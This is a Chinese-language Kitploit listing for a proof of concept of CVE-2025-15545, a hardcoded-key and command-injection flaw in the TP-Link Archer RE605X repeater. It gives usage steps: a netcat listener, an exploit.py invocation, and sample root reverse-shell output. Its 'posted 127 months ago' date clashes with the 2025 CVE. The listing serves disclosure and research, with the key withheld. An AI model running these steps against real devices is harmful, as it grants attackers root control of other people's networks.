Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/xernary/cve-2025-15545
嵌入式系统安全物联网安全漏洞分析漏洞利用逆向工程命令与控制
GitHubxernary/cve-2025-15545

CVE-2025-15545

CVE-2025-15545 的概念验证

查看仓库
127个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2025-15545

信息

厂商: TP-Link
厂商网站: TP-Link
型号: Archer RE605X
硬件版本: RE605X v3.0
固件版本: RE605X(EU)_V3_1.1.5 Build 20240905
固件下载地址: TP-Link

一系列漏洞——包括使用硬编码的加密密钥以及 XML 配置解析器组件中的命令注入——使本地已认证攻击者能够以 root 身份在设备上实现远程代码执行(RCE)。

PoC 要求

注意: exploit.py 概念验证演示了一个链式攻击场景,并依赖已认证用户的凭据作为额外的前提条件。此认证步骤不在 CVE-2025-15545 的覆盖范围内,仅用于演示目的。

  • 攻击者和受害者都必须连接到中继器的本地网络。
  • 受害者必须已通过中继器 Web 控制面板的认证。

使用方法

在单独的终端上监听传入连接:

root@kitploit:~
$ nc -lvnp 4444

执行 exploit.py 脚本:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

注意:aes_key 和 aes_iv 是设备用于配置文件加密和解密的硬编码加密密钥,此概念验证需要用到它们。出于安全问题,此处无法提供。

在第一个终端上接收反向 shell:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

参考资料

这些漏洞由 Nicola Giuffrida 报告。

  • 完整分析文章:https://nico-security.com/posts/cve-2025-15545
  • CVE 记录:https://www.cve.org/cverecord?id=CVE-2025-15545
  • TP-Link 安全公告:https://www.tp-link.com/us/support/faq/4929
下载工具